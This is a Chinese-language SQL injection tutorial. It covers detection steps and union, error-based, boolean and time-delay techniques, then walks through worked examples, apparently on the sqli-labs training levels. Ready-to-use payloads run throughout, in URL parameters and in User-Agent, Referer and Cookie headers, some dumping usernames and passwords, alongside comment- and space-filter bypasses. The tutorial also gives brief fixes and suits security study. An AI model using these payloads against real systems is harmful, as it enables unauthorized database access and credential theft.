SQL注入漏洞知识总结

目录：

一、SQL注入漏洞介绍

二、修复建议

三、通用姿势

四、具体实例

五、各种绕过

一、SQL注入漏洞介绍：

SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据（插入/更新/删除）、执行数据库管理操作（如关闭数据库管理系统）、恢复存在于数据库文件系统中的指定文件内容，在某些情况下能对操作系统发布命令。SQL注入攻击是一种注入攻击。它将SQL命令注入到数据层输入，从而影响执行预定义的SQL命令。由于用户的输入，也是SQL语句的一部分，所以攻击者可以利用这部分可以控制的内容，注入自己定义的语句，改变SQL语句执行逻辑，让数据库执行任意自己需要的指令。通过控制部分SQL语句，攻击者可以查询数据库中任何自己需要的数据，利用数据库的一些特性，可以直接获取数据库服务器的系统权限。

二、修复建议

1. 使用参数化查询接口或在代码级对带入SQL语句中的外部参数进行转义或过滤；
2. 对于整数，判断变量是否符合[0-9]的值；其他限定值，也可以进行合法性校验；
3. 对于字符串，对SQL语句特殊字符进行转义(单引号转成两个单引号，双引号转成两个双引号)。

三、通用姿势

3.1 通过以下操作先大概判断是否存在注入点

1. 如果参数（id）是数字，测试id=2-1与id=1返回的结果是否相同，如果做了2-1=1的运算，说明可能存在数字型注入。如果要用+号运算的话，因为URL编码的问题，需要把加好换成%2B，如id=1%2B1
2. 在参数后面加单引号或双引号，判断返回结果是否有报错
3. 添加注释符，判断前后是否有报错，如id=1' --+ 或 id=1" --+ 或id=1' # 或id=1" --+  （--后面跟+号，是把+当成空格使用）
4. 有些参数可能在括号里面，如：SELECT first_name, last_name FROM users WHERE user_id = （'$id'）；所以也可以在参数后面加单双引号和括号，如id=1')  --+ 或 id=1") --+ 或id=1') # 或id=1") --+
5. 参数后面跟or 或者and，判断返回结果是否有变化，如1' or 'a'='a  或者and 'a'='a或者1' or 'a'='b或者1' or '1'='2
6. 如果返回的正确页面与错误页面都一样，可以考虑时间延迟的方法判断是否存在注入，如  1’ and sleep(5)

3.2 如果存在注入，利用注入获取信息

3.2.1 查询结果如果可以直接返回

利用联合查询一步步的获取信息，如：

// 获取数据库名称，注意联合查询要求前后查询的列数和数据类型必须对应
1' union select schema_name ,1 from information_schema.schemata -- 

//根据上一步获取的数据库名称，获取表名
1' union select table_name from information_schema.tables where table_schema='database_name'

//根据上面的数据库名称和表名获取字段名
1' union select column_name from information_schema.columns where table_schema='database_name' and table_name='table_name' 

//获取字段值，使用group_concat的目的是把查询结果合并成1列，另外，如果跨数据库查询值得花，需要使用数据库名.表明的格式，比如information_schema.schemata
1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from 数据库名.表名

3.2.2 通过报错回显查询结果，如：

#利用报错回显查询到的值,回显当前的数据库名
and extractvalue(1,concat(0x7e,(select database())))

#回显表名
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' )))  

#回显列名
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) 

3.2.3 布尔型注入，如：

 #判断数据库名的长度是多少
SELECT * FROM users where id ='1' and LENGTH(database())=8    

# 二分查找发挨个判断数据库名称的每个字母
SELECT * FROM users where id ='1' and ascii(substr((select database()),1,1))>115   

#挨个判断此数据库中表的每个字母
SELECT * FROM users where id ='1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>116  

3.2.4 时间延迟注入，如：

and IF(ascii(substr((select database()),1,1))>115,1,sleep(5))

四、具体实例

4.1  字符型（参数在单引号内，直接返回结果）

步骤1：参数后面加一个单引号报SQL错误

分析：单引号报错，所以参数在两个单引号里面，通过闭合单引号、联合查询直接查询到数据库数据

步骤2：构造payload

id=0' union select NULL,database(),NULL --+   #查询当前数据库的名称

#爆库名

id=0' union select null,group_concat(schema_name),null from information_schema.schemata --+

#爆表名

id=0' union select null,group_concat(table_name),null from information_schema.tables where table_schema='security' --+

#爆字段名

id=0' union select null,group_concat(column_name),null from information_schema.columns where table_schema='security' and table_name='users' --+

#获取数据库中的数据

id=0' union select null,group_concat(username,0x3a,password),null from security.users--+

4.2  数字型（直接返回结果）

步骤1：id=1与id=2-1返回相同结果，数字型注入

步骤2：构造payload

无需引号闭合，id后面直接跟联合索引就行了

#爆库名

4.3  字符型（参数在单引号和括号内、直接返回结果）

步骤1：输入单引号报错，根据报错可知参数在单引号和括号内

步骤2：闭合查询

用单引号、括号和注释闭合查询，payload: id=1') --+

步骤3：各种爆，与上面的操作相同

4.4  布尔型（参数在单引内、不返回查询结果）

步骤1：输入单引号报错，根据报错得知参数在单引号内，构造id=1' --+返回正确页面，确认存在注入

步骤2：查询结果不返回，根据id=1' and 1=1 --+  与 id=1' and 1=2 --+返回结果不同，判断存在布尔型注入

步骤3：构造payload，先判断数据库名的长度，id=1' ' and LENGTH(database())=8 --+  值等于8的时候返回正确的页面，说明数据库长度为8

步骤4：通过二分查找法，挨个判断数据库名称的每个字母

id=1' and ascii(substr((select database()),1,1))>110  --+  #判断第一个字母的ascii是否大于110，返回正确页面，说明大于110

id=1' and ascii(substr((select database()),1,1))>118  --+  #判断第一个字母的ascii是否大于118，返回不正确页面，说明小与等于118

id=1' and ascii(substr((select database()),1,1))>115  --+  #判断第一个字母的ascii是否大于115，返回不正确页面，说明小与等于115

id=1' and ascii(substr((select database()),1,1))>113  --+  #判断第一个字母的ascii是否大于113，返回正确页面，说明大与113

id=1' and ascii(substr((select database()),1,1))>114  --+  #判断第一个字母的ascii是否大于114，返回正确页面，说明大与114

大于114，小于等于115，第一个字母的ascii值肯定就是115了，所以第一个字母就是s，依次类推可以查到剩下的所有字母。

4.5 布尔型（参数在单引内和两个括号内、不返回查询结果）
步骤1：输入单引号报错，但没有详细的报错提示

步骤2：增加1个括号也报错，增加2个括号返回正确

步骤3：布尔型，不返回查询结果，payload与上面的相同。

4.6 时间延迟注入（无论查询是否正确都返回一样的页面）

步骤1：如论输入什么，都返回一样的页面，所以考虑时间延迟注入

步骤2：直接1 and sleep(5) --+  没延迟，说明查询语句没有闭合成功

步骤3：猜测参数在单引号内，构造payload:id=1' and sleep(5) --+  页面相应延迟，存在注入

步骤4：构造payload，当数据库名长度为8的时候没有延迟，说明数据库名称的长度就是8

id=1'  AND IF(LENGTH(database())=8,1,sleep(10)) --+

步骤5：通过如下方式，挨个判断数据库名的字母

id=1'  and IF(ascii(substr((select database()),1,1))>115,1,sleep(5)) --+

4.7 字符型报错注入（错误值被返回）

步骤1：按下面的测试，username字段存在字符型注入，参数在单引号内

步骤2：username字段输入一些无关的东西，SQL报错详情被回显

步骤3：利用extractvalue函数，让执行的结果以报错的方式显示出来

extractvalue(目标xml文档，xml路径)，第二个参数的格式是/xxx/xx/xx/xx，如果格式不正确就会把报错显示出来

构造payload:uname=admin' and extractvalue(1,concat(0x7e,(select database())))--+

4.7 user-agent类型的注入

步骤1：user-agent的值被原封返回了

步骤2：这里需要借助源码审计了，否则不容易猜到真实的sql语句。

如下源码所示，SQL语句是三个字段的insert语句，然后$uagent被返回。

步骤3：结合报错注入，构造payload:

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', extractvalue(1,concat(0x7e,(select database()))),'1') #

4.8 Referer类型的注入
方法与上述相同，先闭合sql语句，然后利用报错返回，payload如下：

Referer: http://127.0.0.1/sql/Less-19/',extractvalue(1,concat(0x7e,(select database()))))#

4.9 Cookie类型的注入

步骤1：输入单引号报错，确认属于cookie类型的注入，而且报错回显了，利用报错回显数据

步骤2：构造payload

Cookie: uname=admin' and extractvalue(1,concat(0x7e,(select database()))) #

五、各种绕过

 5.1 注释符被过滤(--、#)

方法1：union查询中多加一个单引号以便闭合sql语句，比如：

id=0' union select null,database(),'null
id=0' union select null,group_concat(schema_name),null from information_schema.schemata union select null,null,'nul

 5.2 空格被过滤

方法1：使用/**/注释符代替空格

未完待续……